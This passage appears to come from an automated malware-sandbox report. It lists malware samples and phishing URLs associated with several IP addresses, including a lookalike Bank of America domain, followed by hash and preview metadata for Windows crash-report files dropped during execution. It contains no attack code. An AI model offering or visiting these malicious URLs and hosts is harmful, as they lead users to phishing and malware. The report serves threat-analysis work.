                                                                                                                                  woXZU5MAZL.exeGet hashmaliciousBrowse
                                                                                                                                  • 104.192.2.242
                                                                                                                                  SGzdSxGBvV.exeGet hashmaliciousBrowse
                                                                                                                                  • 104.192.2.242
                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                  CLOUDFLARENETUSe-statement.xllGet hashmaliciousBrowse
                                                                                                                                  • 172.67.195.141
                                                                                                                                  https://888.comGet hashmaliciousBrowse
                                                                                                                                  • 104.26.7.139
                                                                                                                                  doc_2022100203974182675542.vbsGet hashmaliciousBrowse
                                                                                                                                  • 188.114.97.3
                                                                                                                                  SeaWay-Bill-GOACPTM00386.vbsGet hashmaliciousBrowse
                                                                                                                                  • 162.159.134.233
                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                  • 104.21.63.82
                                                                                                                                  QUOTATION.jsGet hashmaliciousBrowse
                                                                                                                                  • 104.17.233.29
                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                  • 172.67.144.83
                                                                                                                                  Shipping Documents_pdf.gz.exeGet hashmaliciousBrowse
                                                                                                                                  • 23.227.38.74
                                                                                                                                  https:/linkprotect.cudasvc.com/url?a=https%3a%2f%2fcrownindservices.eb-sites.com%2f6320004314693632&c=E,1,Kz4OUT06m81j6EmjJNpNNrI3b_tydhoq-67CRzfNtr_kSwBrIjvDs7ImKo_dXOFwxhLL6Rq6YbMB7NqJsdNG2n6AKnjHTcEySmowSUmn-A,,&typo=1Get hashmaliciousBrowse
                                                                                                                                  • 104.16.123.96
                                                                                                                                  INQ80020091______________________.vbsGet hashmaliciousBrowse
                                                                                                                                  • 188.114.96.3
                                                                                                                                  https://us-west-2.protection.sophos.com/?d=backblazeb2.com&u=aHR0cHM6Ly9jdmpnd3BsbXptcDhiLnMzLnVzLXdlc3QtMDA0LmJhY2tibGF6ZWIyLmNvbS9pbmRleC5odG1s&i=NTk0YWNmYzgxYTNiYzIxNDY5OThkNGNl&t=MUVCb0FlME5ZZGYwbXRNT2FwTE5iaS9kVk8vbU5OZGJ4dnZnSGhqU1g0cz0=&h=d659197a9c644f1082f48b9199b76fea&s=AVNPUEhUT0NFTkNSWVBUSVYPNZBhKjO2liBYMlzHArPx4rIzNKQCRIF1t2b51/U2sQ==Get hashmaliciousBrowse
                                                                                                                                  • 188.114.97.3
                                                                                                                                  https://gdfdvnbresdfgfdfgfdfghv.packersandmovershosur.in/cmooney@nexussystems.comGet hashmaliciousBrowse
                                                                                                                                  • 104.17.25.14
                                                                                                                                  Draw Payment Disbursed.htmlGet hashmaliciousBrowse
                                                                                                                                  • 104.21.40.223
                                                                                                                                  https://www.craft.do/s/0CWCrbvtwc1FvTGet hashmaliciousBrowse
                                                                                                                                  • 172.66.47.6
                                                                                                                                  https://www.canva.com/design/DAFPT9d5aKI/MN1IraSfypK3ZO2p1B_4MQ/view?utm_content=DAFPT9d5aKI&utm_campaign=designshare&utm_medium=link&utm_source=homepage_design_menuGet hashmaliciousBrowse
                                                                                                                                  • 172.64.156.26
                                                                                                                                  https://app.mailtag.io/link-event-v2?mt__id=42b12818-ea00-417d-8257-c07d1768b583#fspano@gmail.com&100-22Get hashmaliciousBrowse
                                                                                                                                  • 104.17.25.14
                                                                                                                                  https://bofa.com-onlinebanking.com/XWmpKSE1GZDVabHB6ZDJORFoyc3hSRWxWYVM5bVNtdFRWREIzUzFsdU5qZGtaV05KTXpGdlZGVmpTMGN5VkVkYU5qZEZiRXN6TmpoWGFWbHJTRkpuVFc5TlNUTXhVVzVUVUhwSGRYbEhNSFJTU0ROa1RYcDFjM3AyUm1Sc1dFZHdkR0ZaZWtoVlVFbEpiRTVEVldKelRYRm5ORlUzZERGdloxRmFUMnhHYUhsTFNVNUtiRmhWVXpCQmFEQmlWamxSTm1WU1pFOXJkWFF3ZUROR2QydHpUVVJyUVZnMk1WUTJaRzV2UFMwdE0yWkthbnBoTjJ0UGFURnFSRWhEZEZKT1pqbHNaejA5LS0wMjMwYjJjNmVmMmQwNDJkN2UxMmYwZDk4YTEzZGUwMmJjY2U5MjJh?cid=1094673293Get hashmaliciousBrowse
                                                                                                                                  • 104.17.240.204
                                                                                                                                  Benefits.htmlGet hashmaliciousBrowse
                                                                                                                                  • 104.17.25.14
                                                                                                                                  #U260e#Ufe0fAudio-msg-0953 (002).htmGet hashmaliciousBrowse
                                                                                                                                  • 104.26.9.91
                                                                                                                                  Payment Advice [209TRAPA00138253].vbsGet hashmaliciousBrowse
                                                                                                                                  • 188.114.96.14
                                                                                                                                  CLOUDWEBMANAGE-EUGBfile.exeGet hashmaliciousBrowse
                                                                                                                                  • 185.220.204.62
                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                  • 185.220.204.62
                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                  • 185.220.204.62
                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                  • 185.220.204.62
                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                  • 185.220.204.62
                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                  • 185.220.204.62
                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                  • 185.220.204.62
                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                  • 185.220.204.62
                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                  • 185.220.204.62
                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                  • 185.220.204.62
                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                  • 185.220.204.62
                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                  • 185.220.204.62
                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                  • 185.220.204.62
                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                  • 185.220.204.62
                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                  • 185.220.204.62
                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                  • 185.220.204.62
                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                  • 185.220.204.62
                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                  • 185.220.204.62
                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                  • 185.220.204.62
                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                  • 185.220.204.62
                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                  ce5f3254611a8c095a3d821d44539877file.exeGet hashmaliciousBrowse
                                                                                                                                  • 185.220.204.62
                                                                                                                                  • 140.82.121.3
                                                                                                                                  • 157.240.20.35
                                                                                                                                  • 162.144.15.231
                                                                                                                                  • 31.13.92.36
                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                  • 185.220.204.62
                                                                                                                                  • 140.82.121.3
                                                                                                                                  • 157.240.20.35
                                                                                                                                  • 162.144.15.231
                                                                                                                                  • 31.13.92.36
                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                  • 185.220.204.62
                                                                                                                                  • 140.82.121.3
                                                                                                                                  • 157.240.20.35
                                                                                                                                  • 162.144.15.231
                                                                                                                                  • 31.13.92.36
                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                  • 185.220.204.62
                                                                                                                                  • 140.82.121.3
                                                                                                                                  • 157.240.20.35
                                                                                                                                  • 162.144.15.231
                                                                                                                                  • 31.13.92.36
                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                  • 185.220.204.62
                                                                                                                                  • 140.82.121.3
                                                                                                                                  • 157.240.20.35
                                                                                                                                  • 162.144.15.231
                                                                                                                                  • 31.13.92.36
                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                  • 185.220.204.62
                                                                                                                                  • 140.82.121.3
                                                                                                                                  • 157.240.20.35
                                                                                                                                  • 162.144.15.231
                                                                                                                                  • 31.13.92.36
                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                  • 185.220.204.62
                                                                                                                                  • 140.82.121.3
                                                                                                                                  • 157.240.20.35
                                                                                                                                  • 162.144.15.231
                                                                                                                                  • 31.13.92.36
                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                  • 185.220.204.62
                                                                                                                                  • 140.82.121.3
                                                                                                                                  • 157.240.20.35
                                                                                                                                  • 162.144.15.231
                                                                                                                                  • 31.13.92.36
                                                                                                                                  V573LzlA6u.exeGet hashmaliciousBrowse
                                                                                                                                  • 185.220.204.62
                                                                                                                                  • 140.82.121.3
                                                                                                                                  • 157.240.20.35
                                                                                                                                  • 162.144.15.231
                                                                                                                                  • 31.13.92.36
                                                                                                                                  0NBtg9qQB6.exeGet hashmaliciousBrowse
                                                                                                                                  • 185.220.204.62
                                                                                                                                  • 140.82.121.3
                                                                                                                                  • 157.240.20.35
                                                                                                                                  • 162.144.15.231
                                                                                                                                  • 31.13.92.36
                                                                                                                                  R0HzYUcMGy.exeGet hashmaliciousBrowse
                                                                                                                                  • 185.220.204.62
                                                                                                                                  • 140.82.121.3
                                                                                                                                  • 157.240.20.35
                                                                                                                                  • 162.144.15.231
                                                                                                                                  • 31.13.92.36
                                                                                                                                  R44EKapFtE.exeGet hashmaliciousBrowse
                                                                                                                                  • 185.220.204.62
                                                                                                                                  • 140.82.121.3
                                                                                                                                  • 157.240.20.35
                                                                                                                                  • 162.144.15.231
                                                                                                                                  • 31.13.92.36
                                                                                                                                  9h0ODJO230.exeGet hashmaliciousBrowse
                                                                                                                                  • 185.220.204.62
                                                                                                                                  • 140.82.121.3
                                                                                                                                  • 157.240.20.35
                                                                                                                                  • 162.144.15.231
                                                                                                                                  • 31.13.92.36
                                                                                                                                  D8Yo1xzSrO.exeGet hashmaliciousBrowse
                                                                                                                                  • 185.220.204.62
                                                                                                                                  • 140.82.121.3
                                                                                                                                  • 157.240.20.35
                                                                                                                                  • 162.144.15.231
                                                                                                                                  • 31.13.92.36
                                                                                                                                  M5sGwiInRJ.exeGet hashmaliciousBrowse
                                                                                                                                  • 185.220.204.62
                                                                                                                                  • 140.82.121.3
                                                                                                                                  • 157.240.20.35
                                                                                                                                  • 162.144.15.231
                                                                                                                                  • 31.13.92.36
                                                                                                                                  GH1RPIdmzR.exeGet hashmaliciousBrowse
                                                                                                                                  • 185.220.204.62
                                                                                                                                  • 140.82.121.3
                                                                                                                                  • 157.240.20.35
                                                                                                                                  • 162.144.15.231
                                                                                                                                  • 31.13.92.36
                                                                                                                                  LNNOKS54yR.exeGet hashmaliciousBrowse
                                                                                                                                  • 185.220.204.62
                                                                                                                                  • 140.82.121.3
                                                                                                                                  • 157.240.20.35
                                                                                                                                  • 162.144.15.231
                                                                                                                                  • 31.13.92.36
                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                  • 185.220.204.62
                                                                                                                                  • 140.82.121.3
                                                                                                                                  • 157.240.20.35
                                                                                                                                  • 162.144.15.231
                                                                                                                                  • 31.13.92.36
                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                  • 185.220.204.62
                                                                                                                                  • 140.82.121.3
                                                                                                                                  • 157.240.20.35
                                                                                                                                  • 162.144.15.231
                                                                                                                                  • 31.13.92.36
                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                  • 185.220.204.62
                                                                                                                                  • 140.82.121.3
                                                                                                                                  • 157.240.20.35
                                                                                                                                  • 162.144.15.231
                                                                                                                                  • 31.13.92.36
                                                                                                                                  No context
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):65536
                                                                                                                                  Entropy (8bit):0.8205277954149528
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:96:MjFLPxQd8w9s+ZYNFoT7R7V6tpXIQcQEc6IcEmcw3d+HbHg/wW6HeaVOyc/8Ih4S:mZyYdA8HaMsejMs/u7svS274ItXu
                                                                                                                                  MD5:863B02A7566FA2576FB2D4E9CF781B01
                                                                                                                                  SHA1:5143DF3665D88EF9C1B49E54B363F31AD75BAB76
                                                                                                                                  SHA-256:E134249820A979514103D8A00BF9A5BC65CE6E4E650B39D79DB6B85C598B9C2D
                                                                                                                                  SHA-512:2EEEC988930BD1C08F9A166A5BE7D033B921F53BE2CCEF7B0159661195F79D0B0AE9A26A4EEF29F16AE57629DE56647871D05D3ACBDEE0D785A3E2B2BC7526BA
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.1.0.5.4.3.2.1.0.6.1.9.1.4.3.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.1.0.5.4.3.2.1.9.1.1.9.1.4.6.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.3.9.d.2.9.4.5.-.3.4.0.4.-.4.a.f.a.-.8.6.e.c.-.c.e.d.4.3.7.9.b.7.f.c.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.9.4.d.a.8.0.8.-.6.c.b.5.-.4.9.6.b.-.8.c.8.7.-.f.2.f.c.5.0.8.d.6.1.f.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.7.7.9.5...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.0.2.4.-.0.0.0.1.-.0.0.1.9.-.9.e.c.6.-.6.f.6.5.a.f.e.2.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.c.c.4.e.d.1.e.9.2.2.b.e.f.c.f.9.e.7.3.8.3.2.3.f.b.2.c.8.0.1.7.0.0.0.0.f.f.f.f.!.0.0.0.0.5.b.2.e.2.c.6.b.4.b.2.9.6.1.a.7.5.7.6.e.8.5.e.7.4.6.f.5.f.9.2.b.a.6.b.5.9.0.6.3.!.7.7.9.5...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.8././.0.1.:.
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):65536
                                                                                                                                  Entropy (8bit):0.8206350910213582
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:96:pHFc4w5geFYNFoT7R7V6tpXIQcQEc6IcEmcw3N+HbHg/wW6HeaVOyc/8Ih4lpNN4:JHJA8HaMsujMs/u7sGS274It3
                                                                                                                                  MD5:90639497C3547B3E09409840BDEFDE9F
                                                                                                                                  SHA1:8A16D5C4B5016C3922B613510FEAD5D056CA5B9C
                                                                                                                                  SHA-256:9B6A120477D9156ED4B35B55D93727FC3941AB6196E52299ED74D2162895E348
                                                                                                                                  SHA-512:72691B5FCF2A42612E721796290480E699DC38E744BE4F43DD484697D091A9525D5A48D43E0B384D4E4A39CA6FD3536A3E9DBB469A5EC4DAC8D877A544D4526F
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.1.0.5.4.3.2.1.0.9.4.6.5.7.0.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.1.0.5.4.3.2.1.9.5.8.7.2.0.7.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.4.4.0.7.7.1.7.-.b.3.1.e.-.4.1.7.9.-.8.f.b.6.-.a.5.7.f.9.6.a.f.1.6.c.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.8.4.f.2.0.0.f.-.4.9.c.2.-.4.c.8.8.-.a.b.3.a.-.8.6.5.f.4.8.b.8.e.8.e.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.8.3.7.D...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.8.8.c.-.0.0.0.1.-.0.0.1.9.-.7.f.f.5.-.5.c.6.6.a.f.e.2.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.9.f.a.5.b.6.d.c.1.9.5.1.e.b.1.d.9.9.7.1.3.5.7.1.9.2.8.2.3.7.6.0.0.0.0.f.f.f.f.!.0.0.0.0.5.b.2.e.2.c.6.b.4.b.2.9.6.1.a.7.5.7.6.e.8.5.e.7.4.6.f.5.f.9.2.b.a.6.b.5.9.0.6.3.!.8.3.7.D...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.8././.0.1.:.
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):8386
                                                                                                                                  Entropy (8bit):3.699248408804388
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:192:Rrl7r3GLNiJF6N6YBSkSUmTmPgmfY3RS+GCpDk89bR3sf4Ybm:RrlsNib6N6YBhSUC+gmfY3RSoR8f4J
                                                                                                                                  MD5:AD2B946F2F4142ED74404845577170C9
                                                                                                                                  SHA1:D0BDBB8711ED1A90034E83F1D2EEC1DB82B14692
                                                                                                                                  SHA-256:D456EB771C9F39F823DFAA173066DD557B37A34989F0F5D3DD62774D1FC7EA03
                                                                                                                                  SHA-512:0AE571E09AB9BA82CBBFFE5F60479E4F1D88A95B173AFFA5D78F02B981DC43A6FC1C8B8A401CF5D63B8B6F6B6EF25845EA1BACF689F2EDDBF7A1E0CFF29F6814
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.1.3.2.<./.P.i.d.>.......
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):4683
                                                                                                                                  Entropy (8bit):4.480568114445589
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:48:cvIwSD8zsBrJgtWI9WByWgc8sqYjjT8fm8M4JCCdddja7Fn7+q8vedjaeXtlt1d:uITfj1BTgrsqYAJCVZKNe971d
                                                                                                                                  MD5:F54DF94C2147C6AC88D33F10F7959D90
                                                                                                                                  SHA1:270DF9F1C6B7819E9D001D6ACD92A1A46F3D911D
                                                                                                                                  SHA-256:E2015CBEC9658F8135B56EFDD57578C18838FE2598790409308D2879AC769D35
                                                                                                                                  SHA-512:E8E70D07914BF152FA97EC82EB1215D9369271603C34CA0D48463C4FB4105B4A9ED6E39836B021846D9F1B87A11E71973C9702397F01A40532E4FF329FC1B075
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1740377" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):8386
                                                                                                                                  Entropy (8bit):3.7009707298520187
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:192:Rrl7r3GLNiSu6Ia6YBSMSUCTmPgmfs3RS+GCpDg89bRCsfFbm:RrlsNiD6Ia6YBJSUm+gmfs3RS0RBfk
                                                                                                                                  MD5:5550EEBB27EB8880799F2CCA5398302F
                                                                                                                                  SHA1:B39E9913333727EC21F6E266B0E6FE82A28B37C0
                                                                                                                                  SHA-256:21C26B228D5523153419FC31B7BDC188FEC0276BE650DFA64C80D109D3F37E67
                                                                                                                                  SHA-512:5470167111172335B17F9087B515A8BBF92C0FDC4765BB19F1BEF477BBF2944CB1E3F96D8A23A390F5DCD4A2483BF8654AB43EDF7147CDA6D98755375B133D8E
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.1.8.8.<./.P.i.d.>.......
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):4683
                                                                                                                                  Entropy (8bit):4.4822263377295615
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:48:cvIwSD8zsBrJgtWI9WByWgc8sqYjH8fm8M4J17a7FK+q8vS7acZKBrd:uITfj1BTgrsqYAJQIKfcZKBrd
                                                                                                                                  MD5:9D5E471F72E7084F7355E531FC21AB13
                                                                                                                                  SHA1:E74858B9C82A8DFF326ECDFF81ADEC399A93E5B4
                                                                                                                                  SHA-256:7153FA9D20C8F620C918C0759347B8D5F290767BA6683259F348D9D20F62DF29
                                                                                                                                  SHA-512:49D391CE6B3A6712507EB53D97CDA3CF51DBEEE557E8622FC314C8F5753B9405330CFDFAEABA86274D99EF301B9E4B780EB22FC4FAE0A18AA30CE69AE6CC9FFB
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1740377" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:Mini DuMP crash report, 14 streams, Tue Oct 18 05:06:56 2022, 0x1205a4 type
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):41004
                                                                                                                                  Entropy (8bit):2.2994614483407765
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:192:SJBDS/nASHOipOAzAs7IHppA1eHDoca8dxkfz0hNkilyQXqK7AjFTb:yB+NsAMsk2OZ0ghCk6geFP
                                                                                                                                  MD5:87B8F1AABE9DC4A4266FFCECE740D649
                                                                                                                                  SHA1:5AA3199321354CEB80A249E981F918962D911BA4
                                                                                                                                  SHA-256:CB5D2782F7755727C1055C9CA535E21172C0EC0AC516C02510DFE8C3DD0E948B
                                                                                                                                  SHA-512:342AD6E2CD739418FEFF0E6ED217B26AB48AB44FD8BE9D3ABBB7337C0BDB9071A0858505CABCE26AB9E1CD271A85C1FBD796327A29766E2E24A9484A2812805C
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:MDMP....... .......p4Nc.........................................&..........T.......8...........T...............|............................................................................................U...........B......8.......GenuineIntelW...........T.......$...[4Nc............................. ..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:Mini DuMP crash report, 14 streams, Tue Oct 18 05:06:57 2022, 0x1205a4 type
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):46488
                                                                                                                                  Entropy (8bit):2.1671849341649634
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:192:n3i6HIHOAzasvLvIdta/TbMHxkV20hNkavwAOKjI49/2VHj:PAEva/oCthCIWj
                                                                                                                                  MD5:50A99458279B5187DB09B63AFB00AC53
                                                                                                                                  SHA1:D741ACBE15EEDDCC8B34E6FDF18A8059CC4DC3AB
                                                                                                                                  SHA-256:4656BF89189B7B414CCEB49C73A0629315B5069EB299D05322E62311753FE20E
                                                                                                                                  SHA-512:7292FDB0E4B156C57AE77933B586922CEFFDCF5BCBD1ADCD0D99010BC07E2F4903C693354D1533A5270CF28176F6FD4BF1EE2FB967536E75796588248AF8A8AB
                                                                                                                                  Malicious:false
